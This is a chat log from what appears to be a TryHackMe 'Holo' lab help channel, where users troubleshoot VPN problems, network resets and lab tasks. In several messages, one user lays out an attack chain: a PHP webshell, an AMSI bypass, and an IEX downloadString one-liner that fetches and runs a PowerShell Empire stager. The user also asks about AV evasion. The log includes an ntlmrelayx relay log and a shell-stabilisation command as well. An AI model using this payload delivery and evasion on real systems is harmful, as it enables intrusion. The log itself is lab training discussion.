Gave +1 Rep to @lone spruce

pale light
#

Alright holo - here we go!

pale light
#

holo was a good time ty team who put that together

pearl compass
#

Hey guys. Is the Holo network down right at the moment? After it has paused i am not able to reach any of the hosts again. VPN is fine. Tunnel is up and routes are correct. Maybe someone can upvote the reset button?

coarse mortar
#

is the web page for L-SRV01 supposed to be "parked"?

river fable
#

how long does it usually take for a network to reset? I wanted to tackle this network but it has been saying resetting since i opened the page and I can't reach any hosts.

deft schooner
#

anyone know whats wrong?

quiet raft
marsh kelp
#

On Task 14.. I can't seem to stabilize the shell... and only some commands are providing data to stdout

#

is there a way to confirm what's working and what isn't?

marsh kelp
marsh kelp
#

and then i just ran

/usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
#

voila! stabilised shell

marsh kelp
#

on task 16... my network went to sleep or crashed.. whichever

#

and now, i can't reach 10.200.155.33 (literally, no route to host)

#

ideas?

sage pine
#

Hey Jedis. This my second go at this network. If anyone wants to link up to work on it together let me know. Hacker's unite!!!!!!

errant sky
#

Lets go bois, I'm goinG in on the holo challenge

#

wish me luck

sage pine
# marsh kelp ideas?

could be several of us scanning 33 at the same time. I had to change some of my scans to a lower thread. Right know I cant reach 33 either. crossing fingers it response soon lol. Just realized my subnet is .109.33 so we both in the same boat.

sage pine
#

We need 2 more for the reset. System is still showing "Destination Host Unreachable"

sage pine
#

WB back baby!!!!!!

jagged pewter
#

Can I get a reset on 10.200.114.0/24 please, L-SRV01 has crashed and continues to be unresponsive

sage pine
#

Can I get some love on .109.33 and can we thread our scans a little lower. admin.holo.live is becoming un responsive. I can get pings but the site is not loading when trying to log in. Hackers UNITE!!!!!!!!!!!

sage pine
#

Working on Task 21. The user that should be in the shadow file is not there, not sure if it was overwritten by a user or something I am missing. Any advised would be cool?

sage pine
#

we in business coolguy

haughty prism
#

any admins here?

#

need help with the ssh keygen

#

@dusty forge ??

quiet raft
scenic cosmos
#

I am connected via the holo vpn but the network seems to be hosed. i am unable to get any response from the 10.200.95.33 machine and, even though I am connected via VPN (verified on the Access page) I am unable to click the reset button to vote for a reset because the page thinks that I am not connected

severe locust
#

I downloaded the VPN profile for Hololive and always get a zero byte file.

severe locust
hollow steepleBOT
#

Gave +1 Rep to @spare beacon

severe locust
#

wreath vpn profile can be downloaded, but only hololive returns an empty file

swift sapphire
earnest hornet
#

Send a screenshot of your network diagram at the start of the room?

swift sapphire
#

When I leave the one room and go to the jr room there's no option to join.

#

Is that correct?

#

Sent you a screenshot

sage pine
#

Stuck on "Task 47". This is the second time I try a Win command that is suppose to restart the end point not shut it down. The documentation says "We can now restart the machine; it is essential that you restart the device and not shut down the device. Give the server a few minutes to restart; scan the server again and ensure it returns as closed."

CMD: shutdown /r

Attempted too:
xfreerdp
evil-winrm

swift sapphire
#

Any update on the empty openvpn config file? Has the issue been fixed?

#

Guess not. Just tried again.

strange rock
#

sadCat no more 69 subnet from the days of pre release holo testing

errant sky
#

Just a homie asking for a reset

#

;-; website hasn't been responding (on the attack box)

errant sky
#

nvm.

#

protip ** redo the nmap scan on the subnet

pearl oasis
#

hey is the network down ?

#

cant access holo.live

spare beacon
#

Are you using the holo vpn?

hardy zenith
#

$ gobuster vhost -u http://holo.live -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt

Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://holo.live
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
[+] Append Domain: false

2023/04/07 11:37:17 Starting gobuster in VHOST enumeration mode

Found: 1 Status: 400 [Size: 422]
Found: 11192521404255 Status: 400 [Size: 422]
Found: 11192521403954 Status: 400 [Size: 422]
Found: gc._msdcs Status: 400 [Size: 422]
Found: 2 Status: 400 [Size: 422]
Found: 11285521401250 Status: 400 [Size: 422]
Found: 2012 Status: 400 [Size: 422]
Found: 11290521402560 Status: 400 [Size: 422]
Found: 123 Status: 400 [Size: 422]
...

What am I doing wrong here?

#

I added the domain to /etc/hosts and when I try to ping the webserver, I get pakets back. But gobuster just gives me Status 400 response

bitter wolf
hardy zenith
#

Thanks, for your help. That worked! I guess I need to invest more time into gobuster and its options πŸ™‚

barren latch
#

Hi
I connected to the network with the OVPN file. Had an issue with the data ciphers option, added it to the file as always. Established a connection successfully , checked it via the dedicated site.
Checked if the network is up and running for more than 8 minutes, recommended 5 usually isn't enough in my experience.
Then after attempting to get a port sweep of the subnet, I received "no-response" from 10.200.64.0, 10.200.64.1, 10.200.64.2, 10.200.64.3
Then got an error about probes being dropped from nmap only to realize my ovpn connection has been terminated for some reason

zenith delta
barren latch
hollow steepleBOT
#

Gave +1 Rep to @drifting ravine

zenith delta
dire plume
#

today holo is giving problems

#

someone can totally reset the network 10.200.95.0/24?

#

plus if one uses nc in the rce... and if the nc session get canceld in the terminal with cntrl +c ... the server keeps hanging... making it impossible to work with

#

I'm getting crazy here

#

I think someone fucked up the port 80 of the first webserver

#

Please God of the Server, gives us a Manifestation, tell us how stupid we are and get rid of our stupid problems!

#

@zenith delta

#

ping ping ping!

barren latch
#

22 / ssh is allowed. You can also make an ssh backdoor then. Gosh I hate the word

dire plume
#

?? I don't even have a shell in there I cannot even reach port 80 to gain the first foothold

#

ip 10.200.95.33

#

is that right?

#

you look sus

barren latch
dire plume
#

xD don't be hard on yourself... this should be a service to people that might want to pay too... plus it should be treated with TLC because the aim of the platform IS NOBLE

#

But honestly the reset timer and the counter shouldn't be that high

#

Ill now try to leave the room and rejoin it in 30 minutes hoping the network IP assigned to me won't be the same otherwise Ill kill myself

#

ffk

barren latch
#

mate I paid for it though haha. For THM subscription I mean

#

Nvm I thought raspberry pis weren't this cheap.
Well, time to see if learning how to setup a lab on my own network is worth the effort. If so I'll just work on that instead of public ones here LOL

barren latch
dire plume
#

but you are right, this is paid service... we shouldn't be too laid back about that...

#

Admins since this is not probono charity will you answer my prayers and please reset the 10.200.95.0/24 holo network?

#

I reached the 80 on the 10.200.95.33 thank you jeeeezuz

finite linden
#

Anyone know if there's problems with the .33 host atm?

Seen the posts above and I can't seem to scan / interact with .33 on the 10.200.114.0/24 subnet.

zenith delta
zenith delta
finite linden
zenith delta
finite linden
#

Ya, think a few others on the same subnet may be having a similar issue.

doh!

#

nudge blobfingerguns

#

weirdly, it's just popped up.

If anyone was reading this and did something, thankyou vent

dire plume
#

same issue here... the server .33 is hanging after a nc session went off

#

it seems there isn't a daemon set in there that will restart to a default state all the processes after a while

#

but I say that the issue might be resolved with a lower restart counter

#

this is not good guys...

#

it has been already 30 minutes

#

-.-

#

In the whole day today I must have wasted something like 1.45 hr for this kind of issues

dire plume
#

still the same

#

another 40 min went by

barren latch
#

Yeah I abandoned hope for doing this network for the foreseeable future.

storm sun
#

Yeah, the .33 is messy. But once you get through it, there aren't any issues.

barren latch
storm sun
barren latch
#

and you know, just how this whole "job" thing works πŸ˜‚ ||cold sweat||

storm sun
#

After getting OSCP, i just did the "spray and pray". Got an intern working webapp pentests at a startup which has evolved into a fulltime-ish role which I can legally only call an intern. Almost a year working with them so I do other things too not just pentests.

storm sun
barren latch
hollow steepleBOT
#

Gave +1 Rep to @storm sun

storm sun
#

But yeah, other than that it just varies. Some ppl need a very specific thing in their new employees and thats what they ask in interviews.

#

I was asked webapp ques only. Nothing too over the top. Having oscp was a boost to my application since i wasnt 100% sure of answers and the interviewer could tell that.

barren latch
#

Okay, anything outside the scope of OSCP then? I've heard a number of people with OSCP had problems with at least a few questions during interviews. Blind SQLi and other stuffs. Any tips what should I learn about after getting it?

storm sun
#

Upto the role you are applying for i guess. Pentester roles sometimes want you to have some exp with android/ios too. You cant really fit the criteria for all job roles which say pentester because all of them have different job descriptions haha.

#

CySec is too broad to guess what your interviewer will ask you i feel. Apart from the things like CIA triad sometimes and things like OWASP TopTen.

#

Spray and Pray is the solution to finding a role that suits you.

barren latch
#

"Try harder" even when it comes to finding a job it seems. Welp, such is life πŸ˜‚
Thank you so much for answering all of my questions. They certainly helped clear the cloud of uncertainty that's been following me for quite some time now.
I'll be going now.
Good luck and happy hacking !

rustic dragon
#

anyone else have issues reaching dev.holo.live? I can connect to the main site

weary crypt
#

Holo Network is mega unstable... or perhaps it's just me

cerulean remnant
#

Task43: If someone can give me a hint on which scheduled task I need to hunt, I tried to dump all services and scheduled tasks, then compare if there is any similarity but I can't really find anything ...

novel falcon
#

Facing Issues with Holo VPN

I can't download the vpn file for Holo Network. Trying to download it goes to the 404 error page (Lost in matrix). Tried regenerating the file, restarting my computer, changing browser to access Tryhackme. But nothing worked. The other networks work.

spare beacon
novel falcon
weary crypt
#

I know that Holo is shared - but in all fairness, for the majority of the lab networks I would pay extra to allow for private sessions. The amount of times the lab failed and needed to be reset is silly...

dire plume
#

Hi someone can please help me with AV evasion? I'm searching a proper payload for powershell empire...

#

or in any case ... the way you used to hack into the 10.200.x.33

#

(when you uploaded the covenant shell)

livid hatch
dire plume
#

So you used hoaxshell alone, or alongside powershell-empire to then inject in memory modules?

weary crypt
#

Anyone also having issues connecting to Holo today?

dire plume
#

If i use the command you shared... Ill get an error that tells me that the payload im using (which is a powershell empire payload) has too many characters

weary crypt
dire plume
#

That's great ill share asap

dire plume
#

[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6560964). Try redirecting the command's output to a file and transferring it to your machine

#

What did I do?

  1. I run a php rce, got a php cmd webshell,

  2. I inserted the hoaxshell payload in the php shell,

  3. From within the hoaxshell, I bypassed the Amsi

  4. in the same powershell session, I tried to run the command you used to reach for my powershell empire payload,

  5. the command I used is:
    IEX(New-Object Net.Webclient).downloadString('http://10.x.x.8x:443/download/powershell/[BASE64ENCODEDPATH]')

#
  1. the response is:
    [Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6560964). Try redirecting the command's output to a file and transferring it to your machine
#

If I do:
curl http://10.x.x.8x:443/download/powershell/[BASE64ENCODEDPATH]' -o paypay.ps1
And then:
./paypay.ps1
It sais: "[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6546960). Try redirecting the command's output to a file and transferring it to your machine"

#

If I just copy and paste the code in the hoaxshell, it prints out:"[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6585388). Try redirecting the command's output to a file and transferring it to your machine"

dire plume
#

It actually hit the powershell-empire server but then that error comes out

#

Can I change the way powershell-empire send stagers?

dire plume
#

[ERROR]: B: admin/get.php requested by 10.200.111.31 with no routing packet.

real fiber
#

Something odd seems to be going on in my end. After the network reset, the 10.200.x.x web server now has a 192.168.100.x IP on the tryhackme network diagram. I tried scanning the old IP at 10.200.x.x and it showed only SSH was up. Network uptime is 21m.

#

Even mysql is running on it. Everything as it was but nothing on port 80!

cerulean remnant
#

Hi guys, I'm working on Task 47 NTLMrelayx task. I received connectivity from the DC but fail to establish connection

[*] SMBD-Thread-54: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, attacking target smb://10.200.107.30
[-] SMBClient error: Connection was reset
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] SMBD-Thread-57: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, but there are no more targets left!
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] SMBD-Thread-57: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, attacking target smb://10.200.107.30

I tried suggested solutions such as ntlmrelayx v0.9.22. The connectivity between attacking device and DC is also fine and my proxychains is version 4. If anyone have an idea, please let me know. Thanks!!

dire plume
#

Ah little detail: I'm using sshtunnel to reach the server i need to reach

dire plume
#

I cannot send screens

bronze wigeon
#

!docs verify

final patioBOT
dire plume
#

Is the .DLL hijack bugged?

#

because it asks me to be administrator but Im just a user... plus there is no Scheduled task with that kav*.exe

dire plume
#

still not working

cloud wadi
#

Hi, I'm connected to Holo's VPN but I get no pings or open ports via nmap to any of the stations on the network

icy latch
#

anyone having issues logging in to a***n.holo.live even after reset?

versed mortar
#

Hi, I am on task 8 it says 10.200.x.0/24 as the target network.

#

Not usre if I understood that correctly but does it mean any IP from 1.0 to 254.254

#

something like that

#

?

#

and also how to translate that to nmap instruction

#

If you're still here, this helped. Thanks for posting.

hollow steepleBOT
#

Gave +1 Rep to @quiet raft

versed mortar
#

My rustscan seems to be going on for pretty long, is my command right ? it is for task 8. I am not too sure about the network selection though.
||rustscan -a 10.200.109.0/24 -t 5000 -u 5000 | tee rust_holo.txt ||

#

Appreciate all inputs. the task says scope of engagement in 10.200.x.0 ?

#

My assigned IP is 10.50.109.108

versed mortar
#

Hi, are there any official THM reps in the channel ?

quiet raft
quiet raft
#

Any support with content is provided on a volunteer basis

versed mortar
#

I assumed 😦

quiet raft
#

Please can you be more specific? What's in the map?

#

They're 10.200.something.something in the map right? With the exception of a 192.168 address?

versed mortar
#

I can't paste images somehow , but yeah there is a ||10.200.112.33||

quiet raft
versed mortar
#

Because I completed wreath earlier so I assumed someone might have solved it this far hence the map is open :D. So my question would be that these hosts on the network are not necessarily pivots to the internal network ? I mean if I have the host why would I be scanning the network and would only be focusing upon theports on the 10.x host in the diagram. Hope I am making myself clear ?

quiet raft
versed mortar
hollow steepleBOT
#

Gave +1 Rep to @quiet raft

quiet raft
versed mortar
#

ok, if I may elaborate. Task 8 says to scan the subnet, while we already have the host identified in the network diagram. So do we still haev to scan the network or we can directly jumps to the host looking for open ports.

quiet raft
#

You've got the IP of a single host

#

Within the network

#

Wouldn't it make sense to go looking for more hosts?

versed mortar
#

yeah it does, so it might not necessarily be a pivot or have the required ports open. I see the point

#

Thanks for that.

quiet raft
versed mortar
#

I am new here just joined today, is there someone I have to request some roles, I see I cannot paste pictures in teh chat.

quiet raft
#

Or even domain controller and some workstations

#

!docs verify

final patioBOT
quiet raft
#

Follow those steps and you should then be able to post images, plus you'll get your shiny THM level here

versed mortar
#

Thanks much!

versed mortar
cloud wadi
#

I think Holo is broken, it's stuck on Resetting for a while now

cloud wadi
#

3 hours later, still stuck on Resetting.

spring lava
#

Anyone help to solve this problem

#

How to connect mysql database

frigid scarab
spring lava
#

Bro at task 21 , I can't get any hashes from the shadow and passwd file whats can i do ??

#

Tell me fast because today i want to complete this Network

frigid scarab
#

do you already escape the container?

pearl apex
#

@royal wren

royal wren
hollow steepleBOT
#

Gave +1 Rep to @pearl apex

keen grove
#

Hey guys, any idea why I can't get a reply from the public-facing server? I got the IP right (||10.200.107.33||) and VPN connected, yet I can't get any response from either nmap or ping

buoyant plover
keen grove
#

I did

buoyant plover
#

I'm working on it right now ,its fine actually

#

Did u generate the vpn file for holo network specifically ?

keen grove
#

Yeah, guess something must be wrong with the vpn config

buoyant plover
#

Whenever u download the vpn file ,always regenerate it

#

And then download

#

And In my case ,i finished wreath previously and then started holo , but for some strange reason i was conected to the wreath vpn (I had two network card interfaces ie tun0 and tun1) .I restarted my virtual box again .It was fine

#

So once check with ifconfig , if u have this issue too

keen grove
#

Nope... I'll try leaving and rejoining

buoyant plover
#

Click regenerate and then download the vpn file again for holo network

rain gust
#

Is the Holo network hung? For me it looks like it is stuck on "resetting"

keen grove
#

Refresh your page

rain gust
#

I did.

keen grove
#

Although it's true I can't connect... huh

rain gust
#

πŸ™‚

#

And the odd thing is the reset vote section is 4/5 so seems to be hung or something.

keen grove
#

2/5 and running for me

rain gust
#

Very strange for sure.

keen grove
#

I see, I have multiple utun interfaces, but restart doesn't help...

#

Any ideas?

buoyant plover
#

R u using virtual box or ur own machine ?

keen grove
#

My own machine

keen grove
#

It's an M1 MacBook pro

buoyant plover
#

Okay, So u r using linux dual boot or something like that ?

#

For Me i was using kali virtual box ,i simply closed it and opened it ,And i didn't have like tun interfaces .

keen grove
#

MacOS

buoyant plover
#

U use MacOS for hacking?

keen grove
#

Yeah

buoyant plover
#

Wow Lol

#

Restart usually shuts everything down in windows atleast as of i know

keen grove
#

Yeah, there's something keeping utun0-utun2 occupied from the system

buoyant plover
#

I never tried using my host os for these purposes ,Kali linux comes with all tools installed and its easy to use too

#

Maybe check some forums for it

#

I remember once i connected radmin vpn in my windows ,the interface kept showing forever .

#

Ig anyways u would have used tryhackme several times so u must be familiar already . When u connect to the vpn ,does it show initialization complete?

keen grove
#

Yeah, it shows connected both in OVPN and in THM

buoyant plover
#

At times when u switch ur wifi too ,It won't connect

#

And u tried pinging that .33 address and it didn't work ?

keen grove
#

yeah, got time out

buoyant plover
#

Did u try accessing the web page ?

keen grove
#

Doesn't seem to work either

buoyant plover
#

Very weird and ur holo network ,does it show running ? Refresh it and see once

keen grove
#

Yeah, running

buoyant plover
#

Contact the tech support for help maybe and see

keen grove
#

The problem is this is not a THM issue

buoyant plover
#

Might be ,i'm not familiar with MAC OS ,so idk how to help u .

autumn panther
#

Guys i dont know whoever faced this issue after getting the creds through LFI on admin.holo . i am not able to get login to the dashboard

#

Could anyone help me out to rectify this issue

autumn panther
#

@still nimbus

buoyant plover
#

I was able to get in once today but after that it has not been possible

#

It would be great if ppl reset the machine

quiet raft
quiet raft
autumn panther
#

@buoyant plover thank you so much

hollow steepleBOT
#

Gave +1 Rep to @buoyant plover

buoyant plover
#

In my case the .35 machine has some issue .I'm unable to connect to it via rdp and i can't even access the shares of the machine .Its seems to be up tho ,i was able to do nmap scan and ping it . My ip 10.200.95.33.

bleak hawk
#

The network is resetting since yesterday, is it normal ?

knotty sable
buoyant plover
knotty sable
knotty sable
buoyant plover
#

Same

#

This holo is breaking my head Lol ,each day it has some issue

knotty sable
#

@buoyant plover sent in PM the error for RDP

weary crypt
#

Hey gentlefolks - anyone ever run into issues lateron in life with Google Collab? I just got a permanent ban for "potential abuse" of the platform .

zenith delta
#

Is the root password crackable? (Already got other two hashes)
Default rockyou didn't help.
Using NVIDIA GeForce RTX 3050 Ti with the command: hashcat -O -a 0 -m 1800 hash.txt -r OneRuleToRuleThemAll.rule rockyou.txt the estimate is ~92 days.

zenith delta
#

Task 37:

~~Why are remmina & xfreerdp failing while rdesktop works? Is it setup that way or simply a bug?~~Stupid thing started working correctly.

Nmap scan says theres no SMB service running on that host either (so both cme and evilwinrm are failing too).

zenith delta
#

Task 39:

Do I have to install .NET frameworks on the target?

zenith delta
#

Appreciate any help in Task 8 in Hothe lo room, I can't access the webserver of the first machine.
I can see that the port is open but can't access it also no Info using -A command.

split cobalt
#

admin.holo is pain cant get rev shell always timeout

pulsar dune
#

Unable to connect to the network after a while. The network is running, VPN is connected but cannot ping the entry point.

#

Even rebooted my machine

split cobalt
#

the entry point machine is not stable at all

#

being stuck for 3 days

weary crypt
pulsar dune
#

Hey! Can anyone assist with the last task?

torpid belfry
#

the entrypoint in the 10.200.109.X should be reviewed. It should not be the norm to have to wait up to a minute or more just for a command to process.

hard ether
#

Can someone solve my issue

#

When i connect openvpn it shows connected but while i do ping to the machine. Ping don't respond.

unkempt tendon
unkempt tendon
unkempt tendon
#

i want help for the amsi and anti virus bypass

#

im stuck

simple harness
#

hi guys

#

i have a question

#

if i want to ping a server out of my network subnet ... would my pc make an arp request to know what is the mac address of my default gateway or it wont if its already stored in arp table

unkempt tendon
#

vote for restart

#

its needed

spare beacon
#

State your subnet

#

its needed

unkempt tendon
#

after dll hijacking, adding a new administrator, when ever i stop smb for NTLM Relay Attack, im not able to loging with my new administrator

#

but before stopping its fine and i can easily login using xfreerdp

#

its say username or password incorrect

surreal storm
#

hi, isn't this supposed to show PC-FILESRV01 and FILE-SRV01?

unkempt tendon
surreal storm
#

thanks I'll look into this tonight

#

but it was working fine a few days ago without having to do this, then I disconnected from the machine and it didn't work anymore

#

I just had the sshuttle from the linux machine

frail glen
#

how to hack feces

unkempt tendon
slow moth
#

My holo is ded

shy plover
#

I may be stupid on this, but I could not get the holo initial recon step to run. I tried enumerating the machine every way I could think of for the vhosts with no results. When I run the command gobuster vhost http://10.200.110.30 -w <list> I return everything as a 200 as it seems to just redirect to the internet site selling the actual domain. Does anyone have a tip for this? I cheated and got the vhosts from a walkthrough, but that was a frustrating couple of hours.

shy plover
#

Can anyone vote a reset? Someone just messed up the L-SRV01 and it is now only showing the apache2 default page.

teal raven
#

I got a shell via hoaxshell but can't connect to 10.200.110.31 via RDP does it need a restart?

surreal storm
#

Can you guys click reset please, the network is broken (.114 subnet)

rapid kiln
#

hi! broken reset button and the vpn not connect to network

surreal storm
#

actually I tihnk we all have th same problem, the PC doesn't restart at this step

#

it just stays shut down

rapid kiln
#

does anyone have access to the network?

#

my ip assignment does not allow to reach the first server (L-SRV01). server 192.168.100.1 - vpn 10.50.x.x

humble lintel
rapid kiln
#

the network remains without access, for weeks with attempts to do what is recommended here (Discord). i was not able to solve it πŸ˜”

#

using VPN or AttackBox, the first server on the network is not reached

#

how can i get support with this case? is it possible here to contact the staff member who review HOLO? @bronze wigeon @pale plover

bronze wigeon
#

Also I doubt you are supposed to ping 192.168.100.1

rapid kiln
rapid kiln
bronze wigeon
spare beacon
#

Sorry for jumping in.

#

We're on the same subnet, and it all works for me.

rapid kiln
long jasper
#

I'm having the same problem. first with machine relevant then the halo, and now wreath network. In the access page it shows i'm connected. when i go to the room the access machines page isn't highlighted. I do have my attack ip address in the top right but i can;t seem to acccess anything.

spare beacon
queen plover
#

So can someone maybe help explain the JSON User Token section for Task 28? I had to look up a walkthrough and I'm still confused about how this worked or how I was supposed to figure it out in the first place.

#

||I get that the bug works by taking the token submitted by the server in the response from the password reset page, because of how it handles the logic for resetting the password in the first place, but I'm not quite sure how I was supposed to put together that I was supposed to submit it as a field to another page entirely. I think reset.php is a redirect from the password reset form? But I'm not sure how I was supposed to be able to figure that out.||

#

^ Spoilers for Holo.

#

I don't say this to mean that Holo is poorly designed or anything like that. But it's more--I don't know enough about web applications to have understood which dots I needed to connect, so to speak, to understand what I should have done with this token once I got it. So because of that, I didn't know what to research to begin to understand that, so if there's any resources someone can point me towards to better understand this specific vulnerability, that would be fantastic.

hollow mason
#

Hi! I have an issue with the webserver of Holo. Logging into the admin dashboard is super slow (minutes!). Maybe someone is killing mysql?

#

@worldly aurora Can you maybe tell me what to do in this situation?

proud mountain
#

Hey I have been working with holo network from tryhackme but pivoting isnt working I tried chisel sshuttle autorun ligolo-ng,. I think this is machines issue can some help me configure it

gentle rock
#

Hey trying to work through holo but getting host unreachable when trying to ping L-SRV01, same thing from attackbox too

hollow lance
#

Hey I cant reach the holo network even though I am connected to the VPN normally

iron galleon
hollow lance
iron galleon
#

that nmap scan wont find anything as you used a x

#

instead of a number

hot minnow
# iron phoenix

I'm having the same problem, I have both www.holo.live and holo.live added to /etc/hosts but it keeps loading the public domain. Any solutions to that problem?

iron phoenix
glass copper
#

Hello..

I cannot transfer chisel binary to container due to lack of permissions…any idea where I can save it?

glass copper
hollow steepleBOT
#

Gave +1 Rep to @spare beacon

undone harness
#

It's quite frustrating thinking you're doing something wrong, but that just the room, it's completely broken whatever the commands or the tools you're using on

undone harness
#

It works with fuff

undone harness
#

Hi, anyone else to reset the network (108.33) ? port 80 on L-SRV01 seems broken, it worked yesterday :

#

nmap gives the same kind of result, only port 22 seems open

undone harness
#

Hi, I don't understand something in task 23 after setting my tunnel, I still can't ping the other "internal" hosts, is this supposed to work like this ?

I can ping them directly from the compromised host (.33) I thought I could ping them by proxying it, so I don't really understand why, is there any firewall rule only allowing .33 to ping them from ? And in that case, why the proxy tunnel does'nt work as expected ?

Any clue ?

I know that I can just upload a tool to enumerate stuff directly on the compromised machine, but why this step here then, if it doesn't allow remote interactions ? Am I doing something wrong ? Is it the only way of getting this ?

I both tried chisel and sshuttle and both networks without result

10.200.X.0/24 is supposed being the external network if I properly understood (.33 the "public facing server"), then 192.168.X.0/24 is the internal one, so why other hosts have "external IP" too in the diagram ?

undone harness
#

ok, sshuttle or chisel don't support ICMP protocol, they only operate at application layer but you still can nmap a remote target with shuttle

#

probably with chisel too with proper options

#

I just don't understand the network design of this room, other machines should only have IPs considered as internal (192.168.X.Y) and nothing on 10.200.X.Y

burnt forge
#

hello guys

#

I get a strange openvpn message

#

"You must define TUN/TAP device"

spare beacon
#

Are you using sudo?

burnt forge
#

yes

#

I tried with the HTB openvpn file to see if it was my local machine the problem but runs fine

#

and the machine vpn runs fine too

#

and the wreath network runs fine too

#

is the holo network the problem

spare beacon
#

HTB and THM use different protocols?

spare beacon
spare beacon
burnt forge
#

nice

#

the file is blank

#

dont know why

spare beacon
#

I've forwarded it on to staff πŸ‘

that's why it's giving you that error.

hollow steepleBOT
#

Gave +1 Rep to @spare beacon

burnt forge
#

so wats the procedure? I'l have a staff member DM me or something?

spare beacon
#

I'm not sure if they will, it could be a site wide issue, and they can sort it and then announce it's fixed.

burnt forge
#

hello all. I have the same problem downloading the VPN file.

#

I can download it but there's nothing inside.